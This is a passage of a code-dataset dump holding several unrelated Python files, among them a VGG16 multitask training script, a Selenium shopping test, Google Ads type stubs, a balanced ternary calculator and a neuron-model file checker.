name='block3_conv3')(x)\nx = MaxPooling2D((2, 2), strides=(2, 2), name='block3_pool')(x)\n\n# Block 4\nx = Conv2D(512, (3, 3), activation='relu', padding='same', name='block4_conv1')(x)\nx = Conv2D(512, (3, 3), activation='relu', padding='same', name='block4_conv2')(x)\nx = Conv2D(512, (3, 3), activation='relu', padding='same', name='block4_conv3')(x)\nx = MaxPooling2D((2, 2), strides=(2, 2), name='block4_pool')(x)\n\n# Block 5\nx = Conv2D(512, (3, 3), activation='relu', padding='same', name='block5_conv1')(x)\nx = Conv2D(512, (3, 3), activation='relu', padding='same', name='block5_conv2')(x)\nx = Conv2D(512, (3, 3), activation='relu', padding='same', name='block5_conv3')(x)\nx = MaxPooling2D((2, 2), strides=(2, 2), name='block5_pool')(x)\n\nvgg16_model = Model(img_input,x)\nweights_path = get_file('vgg16_weights_tf_dim_ordering_tf_kernels_notop.h5',\n WEIGHTS_PATH_NO_TOP,\n cache_subdir='models')\nvgg16_model.load_weights(weights_path)\n\nfor layers in vgg16_model.layers:\n layers.trainable = False\n\ndata_shape = vgg16_model.output_shape[1:]\noutput_from_vgg16_model = Input(shape = (data_shape))\n\nx = Flatten(name='flatten')(output_from_vgg16_model)\nx = Dense(1024, activation='relu', name='t1_fc3')(x)\n#x = Dropout(0.6)(x)\nx = Dense(512, activation='relu', name='t1_fc1')(x)\nx = Dropout(0.6)(x)\nx = Dense(256, activation='relu', name='t1_fc2')(x)\nx = Dropout(0.6)(x)\npredictions = Dense(9, activation='softmax', name='predictions')(x)\n\ndiscrete_top_model = Model(inputs = output_from_vgg16_model, outputs = predictions)\n\nx = Flatten(name='flatten')(output_from_vgg16_model)\n#x = Dense(1024, activation='relu', name='fc3')(x)\nx = Dense(512, activation='relu', name='t2_fc1')(x)\nx = Dropout(0.6)(x)\nx = Dense(128, activation='relu', name='t2_fc2')(x)\nx = Dropout(0.6)(x)\ncontinuous_prediction = Dense(2, activation='tanh', name='continuous_prediction')(x)\n\nconinuous_top_model = Model(inputs = output_from_vgg16_model, outputs = continuous_prediction)\n\nfinal_model = Model(inputs = vgg16_model.input,outputs = [discrete_top_model(vgg16_model.output),coninuous_top_model(vgg16_model.output)])\n\n# TODO Step 3: compiling and training\noptimizer_adam = optimizers.Adam(lr = 0.0001)\noptimizer_rmsprop = optimizers.RMSprop(lr=0.00001)\nfinal_model.compile(loss = ['categorical_crossentropy','mean_squared_error'], \\\n optimizer = optimizer_adam, metrics=['accuracy'])\n\n\n# checkpoint\noutputFolder = './output-affect'\nif not os.path.exists(outputFolder):\n os.makedirs(outputFolder)\nfilepath=outputFolder+\"/weights_c_t1024_t512_t256-{epoch:03d}-{val_loss:.2f}.hdf5\"\ncheckpoint = ModelCheckpoint(filepath, monitor='val_loss', verbose=1, \\\n save_best_only=False, save_weights_only=True, \\\n mode='auto', period=1)\ncallbacks_list = [checkpoint]\n\nn_steps_per_epoch = nb_train_samples/batch_size\nn_val_steps = nb_validation_samples/batch_size\nfinal_model.fit_generator(generator=train_generator(),steps_per_epoch=n_steps_per_epoch,callbacks=callbacks_list, \\\n epochs=nb_epoch,validation_data = val_generator(),validation_steps=n_val_steps, \\\n initial_epoch=0)\nfinal_model.save_weights('mulitask01_e50_t1024_512_256.h5')\n\nfinal_model_json = final_model.to_json()\nwith open(\"vgg16_top_layer_1024_512_256_json.json\", \"w\") as json_file:\n json_file.write(final_model_json)\n","sub_path":"multitask02.py","file_name":"multitask02.py","file_ext":"py","file_size_in_byte":9288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"164933632","text":"import time\nimport pytest\nfrom Utilities.Baseclass import Baseclass\nfrom Testdata.getdata import senddata\n\n\nclass Testflipkart(Baseclass):\n def test_flipkarFlow(self, getdata):\n self.driver.find_element_by_xpath(\"//button[@class='_2KpZ6l _2doB4z']\").click()\n self.driver.find_element_by_css_selector(\"._3704LK\").send_keys(\"Mens watch\")\n self.driver.find_element_by_xpath(\"//button[@class='L0Z3Pu']\").click()\n\n list = []\n time.sleep(3)\n\n# Select the filter and select price low to high\n sortdata = self.driver.find_elements_by_xpath(\"//div[@class='_5THWM1']/div\")\n print(len(sortdata))\n for sort in sortdata:\n if sort.text == getdata[\"sortby\"]:\n sort.click()\n break\n\n time.sleep(5)\n self.driver.find_element_by_xpath(\"//div[@class='QvtND5 _2w_U27']\").click()\n self.driver.find_element_by_xpath(\"//input[@placeholder='Search Brand']\").send_keys(getdata[\"searchbrand\"])\n\n# Pick all the brands and select a particular brand\n Brands = self.driver.find_elements_by_xpath(\"//div[@class='_38vbm7']/div\")\n print(len(Brands))\n for brand in Brands:\n if brand.text == getdata[\"Selectbrand\"]:\n brand.click()\n break\n self.driver.find_element_by_xpath(\"//span[contains(text(),'Apply Filters')]\").click()\n time.sleep(3)\n\n# Add the prices in the list and pick the lowest price\n prices = self.driver.find_elements_by_xpath(\"//div/div[@class='_30jeq3']\")\n print(len(prices))\n time.sleep(3)\n for price in prices:\n list.append(price.text)\n j = list[0]\n for p in range(len(list)):\n if list[p] < j:\n j = list[p]\n\n print(list)\n print(j)\n time.sleep(5)\n# Compare the prices with the lowest price we got in the upper loop and click on lowest price\n for low in prices:\n if low.text == j:\n low.click()\n\n time.sleep(3)\n# Move to new tab and click add to cart button\n self.driver.switch_to.window(self.driver.window_handles[1])\n self.driver.find_element_by_xpath(\"//button[@class='_2KpZ6l _2U9uOA _3v1-ww']\").click()\n self.driver.find_element_by_xpath(\"//span[text()='Place Order']\").click()\n\n\n\n\n\n# Use data with fixture and reture the value and get the values with data[index]\n# @pytest.fixture()\n# def data():\n# return [\"Price -- Low to High\", \"Fast\", \"Fastrack\"]\n\n# Use data with fixture and reture the value and get the values with data[keyvalue] with parameter\n# @pytest.fixture(params=[{\"sortby\":\"Price -- Low to High\", \"searchbrand\":\"Fast\", \"Selectbrand\":\"Fastrack\"}])\n# def data(request):\n# return request.param\n\n# Get the data from test data file and use it in this file\n@pytest.fixture(params = senddata.test_data)\ndef getdata(request):\n return request.param","sub_path":"tests/test_flipcartTest.py","file_name":"test_flipcartTest.py","file_ext":"py","file_size_in_byte":2923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"53337178","text":"import importlib\nimport inspect\nimport logging\n\nfrom . import example_filetype_format\n\nlogging.basicConfig()\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\nBASE_CLASS = example_filetype_format.FileTypeFormat\n\ndef collect_format_types(package_names):\n \"\"\"Find subclasses of the example_filetype_format.FileTypeFormat from a list of package names.\n\n Args:\n package_names: A list of Python package names as strings.\n Returns:\n A list of classes that are in the named packages and subclasses of example_filetype_format.FileTypeFormat.\n \"\"\"\n\n file_format_list = []\n for package_name in package_names:\n importlib.import_module(package_name)\n\n for cls in get_subclasses(example_filetype_format.FileTypeFormat):\n logger.debug(\"checking {cls}.\".format(cls=cls))\n cls_module_name = cls.__module__\n cls_pkg = cls_module_name.split('.')[0]\n if cls_pkg in package_names:\n file_format_list.append(cls)\n file_format_dict = make_format_registry_dict(file_format_list)\n return file_format_dict\n\ndef make_format_registry_dict(cls_list):\n \"\"\"Use an object's _fileType attribute to make a class lookup dictionary.\n \n Args:\n cls_list: A list of Python classes.\n Returns:\n A dictionary mapping the class._fileType to the class.\n \"\"\"\n\n return {cls._fileType: cls for cls in cls_list}\n\ndef get_subclasses(cls):\n for subclass in cls.__subclasses__():\n yield from get_subclasses(subclass)\n yield subclass\n\nPROCESS_FILES_LIST = [x for x in get_subclasses(BASE_CLASS)]\n\nPROCESS_FILES = make_format_registry_dict(cls_list=PROCESS_FILES_LIST)\n","sub_path":"genie/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"393083491","text":"from collections.abc import MutableSequence\nfrom typing import Any\n\nimport proto\n\nfrom google.ads.googleads.v12.enums.types.gender_type import GenderTypeEnum\nfrom google.ads.googleads.v12.enums.types.income_range_type import IncomeRangeTypeEnum\nfrom google.ads.googleads.v12.enums.types.parental_status_type import (\n ParentalStatusTypeEnum,\n)\n\nclass AgeDimension(proto.Message):\n age_ranges: MutableSequence[AgeSegment]\n include_undetermined: bool\n def __init__(\n self,\n mapping: Any | None = ...,\n *,\n ignore_unknown_fields: bool = ...,\n age_ranges: MutableSequence[AgeSegment] = ...,\n include_undetermined: bool = ...\n ) -> None: ...\n\nclass AgeSegment(proto.Message):\n min_age: int\n max_age: int\n def __init__(\n self,\n mapping: Any | None = ...,\n *,\n ignore_unknown_fields: bool = ...,\n min_age: int = ...,\n max_age: int = ...\n ) -> None: ...\n\nclass AudienceDimension(proto.Message):\n age: AgeDimension\n gender: GenderDimension\n household_income: HouseholdIncomeDimension\n parental_status: ParentalStatusDimension\n audience_segments: AudienceSegmentDimension\n def __init__(\n self,\n mapping: Any | None = ...,\n *,\n ignore_unknown_fields: bool = ...,\n age: AgeDimension = ...,\n gender: GenderDimension = ...,\n household_income: HouseholdIncomeDimension = ...,\n parental_status: ParentalStatusDimension = ...,\n audience_segments: AudienceSegmentDimension = ...\n ) -> None: ...\n\nclass AudienceExclusionDimension(proto.Message):\n exclusions: MutableSequence[ExclusionSegment]\n def __init__(\n self,\n mapping: Any | None = ...,\n *,\n ignore_unknown_fields: bool = ...,\n exclusions: MutableSequence[ExclusionSegment] = ...\n ) -> None: ...\n\nclass AudienceSegment(proto.Message):\n user_list: UserListSegment\n user_interest: UserInterestSegment\n life_event: LifeEventSegment\n detailed_demographic: DetailedDemographicSegment\n custom_audience: CustomAudienceSegment\n def __init__(\n self,\n mapping: Any | None = ...,\n *,\n ignore_unknown_fields: bool = ...,\n user_list: UserListSegment = ...,\n user_interest: UserInterestSegment = ...,\n life_event: LifeEventSegment = ...,\n detailed_demographic: DetailedDemographicSegment = ...,\n custom_audience: CustomAudienceSegment = ...\n ) -> None: ...\n\nclass AudienceSegmentDimension(proto.Message):\n segments: MutableSequence[AudienceSegment]\n def __init__(\n self,\n mapping: Any | None = ...,\n *,\n ignore_unknown_fields: bool = ...,\n segments: MutableSequence[AudienceSegment] = ...\n ) -> None: ...\n\nclass CustomAudienceSegment(proto.Message):\n custom_audience: str\n def __init__(\n self,\n mapping: Any | None = ...,\n *,\n ignore_unknown_fields: bool = ...,\n custom_audience: str = ...\n ) -> None: ...\n\nclass DetailedDemographicSegment(proto.Message):\n detailed_demographic: str\n def __init__(\n self,\n mapping: Any | None = ...,\n *,\n ignore_unknown_fields: bool = ...,\n detailed_demographic: str = ...\n ) -> None: ...\n\nclass ExclusionSegment(proto.Message):\n user_list: UserListSegment\n def __init__(\n self,\n mapping: Any | None = ...,\n *,\n ignore_unknown_fields: bool = ...,\n user_list: UserListSegment = ...\n ) -> None: ...\n\nclass GenderDimension(proto.Message):\n genders: MutableSequence[GenderTypeEnum.GenderType]\n include_undetermined: bool\n def __init__(\n self,\n mapping: Any | None = ...,\n *,\n ignore_unknown_fields: bool = ...,\n genders: MutableSequence[GenderTypeEnum.GenderType] = ...,\n include_undetermined: bool = ...\n ) -> None: ...\n\nclass HouseholdIncomeDimension(proto.Message):\n income_ranges: MutableSequence[IncomeRangeTypeEnum.IncomeRangeType]\n include_undetermined: bool\n def __init__(\n self,\n mapping: Any | None = ...,\n *,\n ignore_unknown_fields: bool = ...,\n income_ranges: MutableSequence[IncomeRangeTypeEnum.IncomeRangeType] = ...,\n include_undetermined: bool = ...\n ) -> None: ...\n\nclass LifeEventSegment(proto.Message):\n life_event: str\n def __init__(\n self,\n mapping: Any | None = ...,\n *,\n ignore_unknown_fields: bool = ...,\n life_event: str = ...\n ) -> None: ...\n\nclass ParentalStatusDimension(proto.Message):\n parental_statuses: MutableSequence[ParentalStatusTypeEnum.ParentalStatusType]\n include_undetermined: bool\n def __init__(\n self,\n mapping: Any | None = ...,\n *,\n ignore_unknown_fields: bool = ...,\n parental_statuses: MutableSequence[\n ParentalStatusTypeEnum.ParentalStatusType\n ] = ...,\n include_undetermined: bool = ...\n ) -> None: ...\n\nclass UserInterestSegment(proto.Message):\n user_interest_category: str\n def __init__(\n self,\n mapping: Any | None = ...,\n *,\n ignore_unknown_fields: bool = ...,\n user_interest_category: str = ...\n ) -> None: ...\n\nclass UserListSegment(proto.Message):\n user_list: str\n def __init__(\n self,\n mapping: Any | None = ...,\n *,\n ignore_unknown_fields: bool = ...,\n user_list: str = ...\n ) -> None: ...\n","sub_path":"google-stubs/ads/googleads/v12/common/types/audiences.pyi","file_name":"audiences.pyi","file_ext":"pyi","file_size_in_byte":5511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"248708227","text":"memory = 0\ndef add(bt):\n global memory\n memory += bt_to_int(bt)\ndef subtract(bt):\n global memory\n memory -= bt_to_int(bt)\ndef multiply(bt):\n global memory\n memory *= bt_to_int(bt)\ndef divide(bt):\n global memory\n if bt_to_int(bt) == 0:\n raise ZeroDivisionError('bt can not be 0 when memory devided by bt!\\n')\n else:\n memory //= bt_to_int(bt) \ndef remainder(bt):\n global memory\n if bt_to_int(bt) == 0:\n raise ZeroDivisionError('bt can not be 0 when calculate the remainder!\\n')\n else:\n memory %= bt_to_int(bt)\ndef negate():\n global memory\n memory *= -1\ndef store(bt):\n global memory\n memory = bt_to_int(bt)\ndef bt_to_int(bt):\n dec = 0\n if bt == '':\n raise IndexError\n for i in range(1,len(bt)+1):\n if bt[-i] == 'N':\n dec += -1 * 3**(i-1)\n elif bt[-i] == '1':\n dec += 3**(i-1)\n elif bt[-i] == '0' or bt[-i] == ' ':\n pass\n else:\n raise Exception\n return dec\ndef int_to_bt(n):\n flag = 0\n bt = ''\n BT = ''\n if n >= 0:\n while(n//3):\n bt = str(n % 3) + bt\n n = n//3\n bt = str (n) + bt #0,1,2 to add into bt\n for i in range(1,len(bt)+1):\n \n if (int(bt[-i])+flag) == 2:\n BT = 'N' + BT\n flag = 1\n elif (int(bt[-i])+flag) == 1:\n BT = '1' + BT\n flag = 0\n elif (int(bt[-i])+flag) == 3:\n BT = '0' + BT\n flag = 1\n elif (int(bt[-i])+flag) == 0:\n BT = '0' + BT\n flag = 0\n if (flag): #the rest one to add the head of number\n BT = '1' + BT\n return BT\n else:\n bt = int_to_bt(-n)\n bt = bt.replace('N','T')\n bt = bt.replace('1','N')\n bt = bt.replace('T','1')\n return bt\ndef memory_as_int():\n global memory\n return memory\ndef memory_as_bt():\n global memory\n return int_to_bt(memory)\ndef detect_space(string):\n if ' ' in string:\n raise Exception\ndef evaluate(string):\n string = string.strip()\n global memory\n index = 0\n list1 = ['-', '+', '*', '/', '=', '%']\n dic = {'+':add, '-':subtract, '*':multiply, '/':divide, '%':remainder, '=':store}#may key typos happen\n #if string[0] not in list1:\n #and if string[-1] is digit[1,N,0] or space\n try:\n dic[string[0]]\n except KeyError as msg0:\n return 'The first character should be an operator, ' + string[0] + ' is not!\\n'\n except IndexError as msg4:\n return 'Input can not be nothing!\\n'\n for i in range(1,len(string)):\n \n if (string[i] in list1): #may have error inputs in the first character\n try:\n detect_space(string[index+1:i].strip())\n dic[string[index]](string[index+1:i].strip())\n index = i #if string[-1]='-'... \n except ZeroDivisionError as msg1:\n return msg1\n except IndexError as msg3:\n return string[i-1]+' can not followed by ' + string[i]\n except Exception:\n return 'Space can not be placed in middle of digit!\\n'\n else:\n try:\n bt_to_int(string[i])\n except Exception as msg2:\n return string[i] + ' is not defined in balanced ternary!\\n' \n try:\n detect_space(string[index+1:].strip())\n except Exception:\n return 'Space can not be placed in middle of digit!\\n'\n try: #test if string[-1] is operator\n bt_to_int(string[-1])\n dic[string[index]](string[index+1:].strip())\n except ZeroDivisionError as msg1:\n return msg1\n except Exception as msg2:\n return string[-1] + ' should followed by numbers!\\n'\n return int_to_bt(memory)\ndef REPL():\n string = input('Please input the expressions you want to calculate or just enter quit:')\n if string == 'quit':\n return \n else:\n print(evaluate(string))\n REPL()\n return \n\nif __name__ == '__main__':\n REPL() \n \n \n \n \n\n","sub_path":"CIT590_HW4_Balanced_Ternary/bt.py","file_name":"bt.py","file_ext":"py","file_size_in_byte":4215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"606971927","text":"import numpy as np \nimport pandas as pd\nimport random\nimport sys\n\nw = np.zeros([163, 1])\n\ndef _test(f, result): #240筆\n\tdata = np.genfromtxt(f, delimiter=',', encoding=\"latin1\")[:, 2:]\n\tdata = np.nan_to_num(data)\n\t#data = np.maximum(data, 0)\n\trow = data.shape[0]\n\tcol = data.shape[1]\n\tleft = 0\n\tright = 0\n\tfor i in range(row):\n\t\tfor j in range(col):\n\t\t\tif data[i, j] < 0:\n\t\t\t\tif j == 0 or j == col-1:\n\t\t\t\t\t\tdata[i, j] = 0\n\t\t\t\telse:\n\t\t\t\t\tleft = j-1\n\t\t\t\t\tright = j+1\n\t\t\t\t\twhile (data[i, left] < 0 and left>0):\n\t\t\t\t\t\tleft -= 1\n\t\t\t\t\twhile (data[i, right] < 0 and right < col-1):\n\t\t\t\t\t\tright += 1\n\t\t\t\t\t\tdata[i, j] = ((data[i, left]*(right-j))+(data[i, right]*(j-left)))/(right-left)\t\n\tpredict = []\n\ttemp = []\n\n\tfor i in range(0, data.shape[0], 18): #predict\n\t\ttemp.append(data[i:i+18, :])\t\t\n\t\t#predict.append(y[0])\n\ttest_x = np.array(temp)\n\ttest_x = np.reshape(test_x, (240,162))\n\ttest_x = np.hstack((test_x, np.ones([240,1])))\n\ty = np.dot(test_x, w)\n\ty = np.reshape(y, (1,240))\n\tpredict = y.tolist()\n\tpredict = predict[0]\n\tid_li = [\"id_\"+str(i) for i in range(len(predict))]\n\n\tdataframe = pd.DataFrame({'id': id_li,'value': predict})\n\tdataframe.to_csv(result, index=False, sep=',')\n\t\t\n\nif __name__ == '__main__':\n\t\n w = np.load('w.npy')\n _test(sys.argv[1], sys.argv[2])","sub_path":"hw1/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"65191308","text":"import logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass SmokeTestFail(Exception):\n pass\n\n\nclass SmokeTestRegistry(object):\n def __init__(self):\n self.tests = {}\n\n def register(self, sequence, name):\n def decorator(fn):\n self.tests[name] = {\"sequence\": sequence, \"test\": fn}\n return fn\n\n return decorator\n\n def __iter__(self):\n def seq(key):\n return self.tests[key][\"sequence\"]\n\n for name in sorted(self.tests, key=seq):\n yield name, self.tests[name][\"test\"]\n\n def execute(self):\n for name, test in iter(self):\n status = True\n message = \"\"\n try:\n test()\n except SmokeTestFail as fail:\n status = False\n message = str(fail)\n logger.info(\"SMOKETEST FAILURE - {}: {}\".format(name, message))\n yield {\"name\": name, \"status\": status, \"message\": message}\n\n\nlive_smoketests = SmokeTestRegistry()\nready_smoketests = SmokeTestRegistry()\n","sub_path":"cla_frontend/apps/status/smoketests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"636101453","text":"from repomgr.models import Rom\n\n\nclass Dump:\n def __init__(self, uuid: str, name: str, zipfile: str, roms: [Rom] = list()):\n self.uuid: str = uuid\n self.name: str = name\n self.zip: str = zipfile\n self.roms: [Rom] = roms\n\n @property\n def size(self) -> int:\n acc: int = 0\n for rom in self.roms:\n acc += rom.size\n return acc\n\n def __str__(self):\n return str(self.as_dict())\n\n def as_dict(self) -> dict:\n roms: [dict] = []\n for rom in self.roms:\n roms.append(rom.as_dict())\n\n dct: dict = {}\n dct.update({'uuid': self.uuid})\n dct.update({'name': self.name})\n dct.update({'zip': self.zip})\n dct.update({'roms': roms})\n return dct\n","sub_path":"repomgr/models/dump.py","file_name":"dump.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"52258032","text":"import io\nimport json\nimport os\nimport requests\nimport xml.etree.ElementTree\nimport time\nimport sys\nimport zipfile\nimport shutil\nfrom shutil import copy2\nimport collections\nimport re\n\n\nclass CheckConditions:\n @classmethod\n def checkUploadedModel(cls, file_path=\"\", folder_path=\"\"):\n '''\n Check that the uploaded model .zip file contains all necessary \n files and folder\n '''\n\n if not file_path.endswith(\".zip\"):\n return {\"KO\", \"The uploaded file is not a .zip file\"}\n \n # unzip file\n zip_ref = zipfile.ZipFile(file_path, 'r') \n zip_ref.extractall(folder_path)\n zip_ref.close() \n\n basename = os.path.basename(str(file_path))\n filename_noext = os.path.splitext(basename)\n opt_folder = os.path.join(folder_path, filename_noext[0]) \n if not os.path.exists(opt_folder):\n return {\"KO\", \"The unzipped folder has not the same name as the \\\n .zip file. Please upload a well formatted .zip\"}\n else:\n # check that all folders exist\n folder_list = [\"checkpoints\", \"config\", \"figures\", \"mechanisms\", \\\n \"model\", \"morphology\", \"tools\", \"opt_neuron.py\", \\\n \"__init__.py\"]\n for f in folder_list:\n if not os.path.exists(os.path.join(opt_folder, f)):\n return {\"response\":\"KO\", \"message\":\"Folder/file '\" + f + \"' does not exist in the \\\n optimization folder. Please upload a well formatted \\\n .zip file\"}\n\n # validate json files in config folder\n jsonfile_list = [\"features.json\", \"morph.json\", \"parameters.json\", \\\n \"protocols.json\"]\n keys = []\n for i,j in enumerate(jsonfile_list):\n c_filename = os.path.join(opt_folder, \"config\", j)\n try:\n with open(c_filename, \"r\") as read_file:\n json_data = json.load(read_file)\n keys.append(json_data.keys()[0])\n read_file.close()\n except ValueError as error:\n return {\"response\":\"KO\", \"message\":\"File '\" + c_filename + \"' is either not \\\n present or not readable in 'config' folder. Please \\\n check your .zip file\"}\n all_keys = list(set(keys))\n if len(all_keys) != 1:\n return {\"response\":\"KO\", \"message\":\"All .json files in the\\\n 'config' folder must contain the same data key. \\\n Please upload a well formatted .zip file\"}\n else:\n for line in open(os.path.join(opt_folder, \"opt_neuron.py\")):\n if line.startswith('evaluator = model.evaluator.create'):\n start = \"model.evaluator.create('\"\n end = \"', \"\n opt_key = line[line.find(start)+len(start):line.rfind(end)]\n if opt_key != all_keys[0]:\n return {\"response\":\"KO\", \"message\":\"Line 75 in 'opt_neuron.py' \\\n must contain the same key as the one \\\n contained in the .json files in the \\\n 'config' folder. Please upload a well \\\n formatted .zip file\"}\n\n # validate files in folder mechanisms \n file_list = os.listdir(os.path.join(opt_folder, \"mechanisms\"))\n modfilelist = [x for x in file_list if x[-4:]==\".mod\"]\n if not file_list or len(file_list) != len(modfilelist):\n return {\"response\":\"KO\", \"message\":\"The folder 'mechanisms' \\\n must not be empty and must contain only .mod files\"}\n\n\n # validate files in folder 'model'\n file_list = ['__init__.py', 'analysis.py', 'evaluator.py', 'template.py']\n for f in file_list:\n if not os.path.exists(os.path.join(opt_folder, \"model\", f)):\n return {\"response\":\"KO\", \"message\":\"File '\" + f + \"' does not exist in the \\\n 'model' folder. Please upload a well formatted \\\n .zip file\"}\n\n # validate files in folder 'tools'\n file_list = ['get_stats.py', 'task_stats.py']\n for f in file_list:\n if not os.path.exists(os.path.join(opt_folder, \"tools\", f)):\n return {\"response\":\"KO\", \"message\":\"File '\" + f + \"' does not exist in the \\\n 'tools' folder. Please upload a well formatted \\\n .zip file\"}\n\n # check that only one file is present in morphology\n morph_list_dir = os.listdir(os.path.join(opt_folder, \"morphology\"))\n if len(morph_list_dir) != 1:\n return {\"response\":\"KO\", \"message\":\"Folder 'morphology' must \\\n contain only one file. \" + str(len(morph_list_dir)) + \\\n \"files are present in the folder. Please upload a well formatted \\\n .zip file\"}\n else:\n with open(os.path.join(opt_folder, \"config\", \"morph.json\")) as json_file:\n morph_data = json.load(json_file)\n if morph_list_dir[0] != morph_data.values()[0]: \n return {\"response\":\"KO\", \"message\":\"The file in the \\\n 'morphology' folder must have the same name\\\n of the key in the 'morph.json' file in the\\\n 'config' folder\"}\n \n # validate .mod files in mechanisms\n mechdir = os.listdir(os.path.join(opt_folder, \"mechanisms\"))\n modlist = [x for x in mechdir if x.endswith(\".mod\")]\n if not modlist:\n return {\"response\":\"KO\", \"message\":\"No .mod file in folder\\\n 'mechanisms'. Please check your .zip file\"}\n\n\n return {\"response\":\"OK\", \"message\":\"Folder exists\"}\n \n\n\n @classmethod\n def checkSimFolders(cls, folder_path=\"\"):\n\n if not os.path.isdir(folder_path):\n resp = {\"response\":\"KO\", \"message\": \"Optimization result \" + \\\n \"does not exist. Check your files\"}\n return resp\n #\n check_folder = os.path.join(folder_path, 'checkpoints')\n mec_folder = os.path.join(folder_path, 'mechanisms')\n morph_folder = os.path.join(folder_path, 'morphology')\n\n # check checkpoints folder\n if not os.path.isdir(check_folder):\n resp = {\"response\":\"KO\", \"message\":\"'checkpoints' folder \" + \\\n \"NOT present\"}\n return resp\n list_hoc_files = \\\n [cf for cf in os.listdir(check_folder) if cf.endswith(\".hoc\")]\n if not list_hoc_files:\n resp = {\"response\":\"KO\", \"message\":\"No .hoc file is present \\\n in the final simulation folder\"}\n return resp\n\n # check morphology folder\n if not os.path.isdir(morph_folder):\n resp = {\"response\":\"KO\", \"message\":\"'morphology' folder NOT present\"}\n return resp\n elif not os.listdir(morph_folder):\n resp = {\"response\":\"KO\", \"message\":\"The folder 'morphology' is \\\n empty\"}\n return resp\n \n # check mechanisms folder\n if not os.path.isdir(mec_folder):\n resp = {\"response\":\"KO\", \"message\":\"'mechanisms' folder NOT present\"}\n return resp\n else:\n mec_list_dir = os.listdir(mec_folder)\n list_mod = [i for i in mec_list_dir if i.endswith('.mod')] \n if not list_mod:\n resp = {\"response\":\"KO\", \"message\":\"The folder 'mechanisms'\\\n does NOT contain any .mod file'\"}\n return resp\n\n return {\"response\":\"OK\", \"message\":\"Folders and files structure are correct.\"}\n \n\n @classmethod\n def checkSimFiles(cls, sim_path=\"\"):\n sim_name = ''\n list_dir = os.listdir(sim_path) \n for i in list_dir:\n if i.endswith('.zip'):\n sim_name = os.path.splitext(i)[0]\n break\n if sim_name == \"\":\n resp = {\"response\":\"KO\", \"message\":\"NO simulation .zip file or NO \\\n correct output from optimization\"}\n return resp\n\n check_folder = os.path.join(sim_path, sim_name, 'checkpoints')\n mec_folder = os.path.join(sim_path, sim_name, 'mechanisms')\n morph_folder = os.path.join(sim_path, sim_name, 'morphology')\n\n if not os.path.isdir(check_folder):\n resp = {\"response\":\"KO\", \"message\":\"'checkpoints' folder NOT present\"}\n return resp\n \n if not os.path.isdir(morph_folder):\n resp = {\"response\":\"KO\", \"message\":\"'morphology' folder NOT present\"}\n return resp\n elif not os.listdir(morph_folder):\n resp = {\"response\":\"KO\", \"message\":\"The folder 'morphology' is \\\n empty\"}\n return resp\n \n if not os.path.isdir(mec_folder):\n resp = {\"response\":\"KO\", \"message\":\"'mechanisms' folder NOT present\"}\n return resp\n else:\n mec_list_dir = os.listdir(mec_folder)\n list_mod = [i for i in mec_list_dir if i.endswith('.mod')] \n if not list_mod:\n resp = {\"response\":\"KO\", \"message\":\"The folder 'mechanisms'\\\n does NOT contain any .mod file'\"}\n return resp\n \n if not os.path.isfile(os.path.join(check_folder, 'cell.hoc')) \\\n and not (os.path.isfile(os.path.join(sim_path, \\\n 'template.hoc'))):\n resp = {\"response\":\"KO\", \"message\":\"Neither 'cell.hoc' nor \\\n 'template.hoc' file present in the final simulation \\\n folder\"}\n return resp\n \n # if all conditions are met\n resp = {\"response\":\"OK\", \"message\":\"All needed files are present\"}\n return resp\n\nclass FetchFiles:\n @classmethod\n def fetchOptSetFile(cls, opt_set_file_path=\"\"):\n if os.path.isfile(opt_set_file_path):\n with open(opt_set_file_path) as pf:\n opt_set = json.load(pf)\n pf.close()\n opt_set_dict = {\n \"status\":\"OK\", \\\n \"hpc_sys\": opt_set[\"hpc_sys\"], \\\n \"gennum\": opt_set[\"number_of_generations\"], \\\n \"offsize\": opt_set[\"offspring_size\"], \\\n \"nodenum\": opt_set[\"number_of_nodes\"], \\\n \"corenum\": opt_set[\"number_of_cores\"], \\\n \"runtime\": opt_set[\"runtime\"], \\\n \"wf_id\": opt_set[\"wf_id\"], \\\n }\n else:\n opt_set_dict = {\"status\":\"KO\"}\n\n return opt_set_dict\n","sub_path":"hh_neuron_builder/tools/wf_file_manager.py","file_name":"wf_file_manager.py","file_ext":"py","file_size_in_byte":11175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"394274162","text":"import nltk\nfrom nltk.tokenize import RegexpTokenizer\nimport sys\nimport os\nimport string\nimport math\nfrom num2words import num2words\n\nFILE_MATCHES = 1\nSENTENCE_MATCHES = 1\n\n\ndef main():\n\n # Check command-line arguments\n if len(sys.argv) != 2:\n sys.exit(\"Usage: python questions.py corpus\")\n\n # Calculate IDF values across files\n files = load_files(sys.argv[1])\n file_words = {\n filename: tokenize(files[filename])\n for filename in files\n }\n file_idfs = compute_idfs(file_words)\n\n # Prompt user for query\n query = set(tokenize(input(\"Query: \")))\n\n # Determine top file matches according to TF-IDF\n filenames = top_files(query, file_words, file_idfs, n=FILE_MATCHES)\n\n # Extract sentences from top files\n sentences = dict()\n for filename in filenames:\n for passage in files[filename].split(\"\\n\"):\n for sentence in nltk.sent_tokenize(passage):\n tokens = tokenize(sentence)\n if tokens:\n sentences[sentence] = tokens\n\n # Compute IDF values across sentences\n idfs = compute_idfs(sentences)\n\n # Determine top sentence matches\n matches = top_sentences(query, sentences, idfs, n=SENTENCE_MATCHES)\n for match in matches:\n print(match)\n\n\ndef load_files(directory):\n \"\"\"\n Given a directory name, return a dictionary 